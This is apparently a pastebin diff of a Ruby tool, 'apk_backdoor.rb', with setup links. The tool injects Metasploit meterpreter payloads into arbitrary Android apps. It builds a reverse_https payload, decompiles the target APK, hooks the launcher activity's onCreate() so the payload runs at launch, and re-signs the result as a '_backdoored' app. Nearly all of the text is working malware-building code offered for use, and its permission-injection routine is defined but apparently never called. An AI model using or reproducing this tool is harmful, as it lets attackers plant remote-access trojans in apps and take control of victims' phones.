View difference between Paste ID: <a href="/r2uDVpjH">r2uDVpjH</a> and <a href="/dc2LEQJ5">dc2LEQJ5</a>

# HOW TO USE
1		# HOW TO USE
2		# Your dependencies may not have been in order resulting in a broken payload. Please, follow along by building a developer environment alike this video. Install Debian 8.2 from the Live XFCE dvd. Continue by installing the dependencies found on the cheat sheet in http://pischool.com .
3
4		# STEP #1: (follow these steps->) https://pastebin.com/y7SCd4tq
5		# STEP #2: (follow VIDEO TUT->) https://www.youtube.com/watch?v=uytuVP8f-54&ab_channel=JohnSilvaggio
6	-	#
6	+	# Github --infos: https://github.com/Jack64/metasploit-framework/pull/3
7
8		# ------------ SCRIPT BELOW ------------
9		#!/usr/bin/env ruby
10		# apk_backdoor.rb
11		# This script is a POC for injecting metasploit payloads on
12		# arbitrary APKs.
13		# Authored by timwr, Jack64
14
15
16		require 'nokogiri'
17		require 'fileutils'
18		require 'optparse'
19
20		# Find the activity thatapk_backdoor.rb is opened when you click the app icon
21		def findlauncheractivity(amanifest)
22		package = amanifest.xpath("//manifest").first['package']
23		activities = amanifest.xpath("//activity\|//activity-alias")
24		for activity in activities
25		activityname = activity.attribute("name")
26		category = activity.search('category')
27		unless category
28		next
29		end
30		for cat in category
31		categoryname = cat.attribute('name')
32		if (categoryname.to_s == 'android.intent.category.LAUNCHER' \|\| categoryname.to_s == 'android.intent.action.MAIN')
33		activityname = activityname.to_s
34		unless activityname.start_with?(package)
35		activityname = package + activityname
36		end
37		return activityname
38		end
39		end
40		end
41		end
42
43		# If XML parsing of the manifest fails, recursively search
44		# the smali code for the onCreate() hook and let the user
45		# pick the injection point
46		def scrapeFilesForLauncherActivity()
47		smali_files\|\|=[]
48		Dir.glob('original/smali//.smali') do \|file\|
49		checkFile=File.read(file)
50		if (checkFile.include?";->onCreate(Landroid/os/Bundle;)V")
51		smali_files << file
52		smalifile = file
53		activitysmali = checkFile
54		end
55		end
56		i=0
57		print "[*] Please choose from one of the following:\n"
58		smali_files.each{\|s_file\|
59		print "[+] Hook point ",i,": ",s_file,"\n"
60		i+=1
61		}
62		hook=-1
63		while (hook < 0 \|\| hook>i)
64		print "\nHook: "
65		hook = STDIN.gets.chomp.to_i
66		end
67		i=0
68		smalifile=""
69		activitysmali=""
70		smali_files.each{\|s_file\|
71		if (i==hook)
72		checkFile=File.read(s_file)
73		smalifile=s_file
74		activitysmali = checkFile
75		break
76		end
77		i+=1
78		}
79		return [smalifile,activitysmali]
80		end
81
82		def fix_manifest()
83		payload_permissions=[]
84
85		#Load payload's permissions
86		File.open("payload/AndroidManifest.xml","r"){\|file\|
87		k=File.read(file)
88		payload_manifest=Nokogiri::XML(k)
89		permissions = payload_manifest.xpath("//manifest/uses-permission")
90		for permission in permissions
91		name=permission.attribute("name")
92		payload_permissions << name.to_s
93		end
94		# print "#{k}"
95		}
96		original_permissions=[]
97		apk_mani=''
98
99		#Load original apk's permissions
100		File.open("original/AndroidManifest.xml","r"){\|file2\|
101		k=File.read(file2)
102		apk_mani=k
103		original_manifest=Nokogiri::XML(k)
104		permissions = original_manifest.xpath("//manifest/uses-permission")
105		for permission in permissions
106		name=permission.attribute("name")
107		original_permissions << name.to_s
108		end
109		# print "#{k}"
110		}
111		#Get permissions that are not in original APK
112		add_permissions=[]
113		for permission in payload_permissions
114		if !(original_permissions.include? permission)
115		print "[*] Adding #{permission}\n"
116		add_permissions << permission
117		end
118		end
119		inject=0
120		new_mani=""
121		#Inject permissions in original APK's manifest
122		for line in apk_mani.split("\n")
123		if (line.include? "uses-permission" and inject==0)
124		for permission in add_permissions
125		new_mani << '<uses-permission android:name="'+permission+'"/>'+"\n"
126		end
127		new_mani << line+"\n"
128		inject=1
129		else
130		new_mani << line+"\n"
131		end
132		end
133		File.open("original/AndroidManifest.xml", "w") {\|file\| file.puts new_mani }
134		end
135
136		apkfile = ARGV[0]
137		unless(apkfile && File.readable?(apkfile))
138		puts "Usage: #{$0} [target.apk] [msfvenom options]\n"
139		puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443"
140		exit(1)
141		end
142
143		jarsigner = `which jarsigner`
144		unless(jarsigner && jarsigner.length > 0)
145		puts "No jarsigner"
146		exit(1)
147		end
148
149		apktool = `which apktool`
150		unless(apktool && apktool.length > 0)
151		puts "No apktool"
152		exit(1)
153		end
154
155		apk_v=`apktool`
156		unless(apk_v.split()[1].include?("v2."))
157		puts "[-] Apktool version #{apk_v} not supported, please download the latest 2. version from git.\n"
158		exit(1)
159		end
160
161		begin
162		msfvenom_opts = ARGV[1,ARGV.length]
163		opts=""
164		msfvenom_opts.each{\|x\|
165		opts+=x
166		opts+=" "
167		}
168		rescue
169		puts "Usage: #{$0} [target.apk] [msfvenom options]\n"
170		puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443"
171		puts "[-] Error parsing msfvenom options. Exiting.\n"
172		exit(1)
173		end
174
175
176
177		print "[*] Generating msfvenom payload..\n"
178		res=`msfvenom -f raw #{opts} -o payload.apk 2>&1`
179		if res.downcase.include?("invalid" \|\| "error")
180		puts res
181		exit(1)
182		end
183
184		print "[*] Signing payload..\n"
185		`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA payload.apk androiddebugkey`
186
187		`rm -rf original`
188		`rm -rf payload`
189
190		`cp #{apkfile} original.apk`
191
192		print "[*] Decompiling orignal APK..\n"
193		`apktool d $(pwd)/original.apk -o $(pwd)/original`
194		print "[*] Decompiling payload APK..\n"
195		`apktool d $(pwd)/payload.apk -o $(pwd)/payload`
196
197		f = File.open("original/AndroidManifest.xml")
198		amanifest = Nokogiri::XML(f)
199		f.close
200
201		print "[*] Locating onCreate() hook..\n"
202
203
204		launcheractivity = findlauncheractivity(amanifest)
205		smalifile = 'original/smali/' + launcheractivity.gsub(/\./, "/") + '.smali'
206		begin
207		activitysmali = File.read(smalifile)
208		rescue Errno::ENOENT
209		print "[!] Unable to find correct hook automatically\n"
210		begin
211		results=scrapeFilesForLauncherActivity()
212		smalifile=results[0]
213		activitysmali=results[1]
214		rescue
215		puts "[-] Error finding launcher activity. Exiting"
216		exit(1)
217		end
218		end
219
220		print "[*] Copying payload files..\n"
221		FileUtils.mkdir_p('original/smali/com/metasploit/stage/')
222		FileUtils.cp Dir.glob('payload/smali/com/metasploit/stage/Payload*.smali'), 'original/smali/com/metasploit/stage/'
223		activitycreate = ';->onCreate(Landroid/os/Bundle;)V'
224		payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V"
225		hookedsmali = activitysmali.gsub(activitycreate, payloadhook)
226		print "[*] Loading ",smalifile," and injecting payload..\n"
227		File.open(smalifile, "w") {\|file\| file.puts hookedsmali }
228		injected_apk=apkfile.split(".")[0]
229		injected_apk+="_backdoored.apk"
230
231		print "[*] Poisoning the manifest with meterpreter permissions..\n"
232	-	puts "[+] Infected file #{injected_apk} ready.\n"
232	+
233
234		print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n"
235		`apktool b -o $(pwd)/#{injected_apk} $(pwd)/original`
236		print "[*] Signing #{injected_apk} ..\n"
237		`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey`
238
239		puts "[+] Infected file #{injected_apk} ready.\n"
240		# ------------ SCRIPT ABOVE ------------
241		# SRC: http://pastebin.com/dc2LEQJ5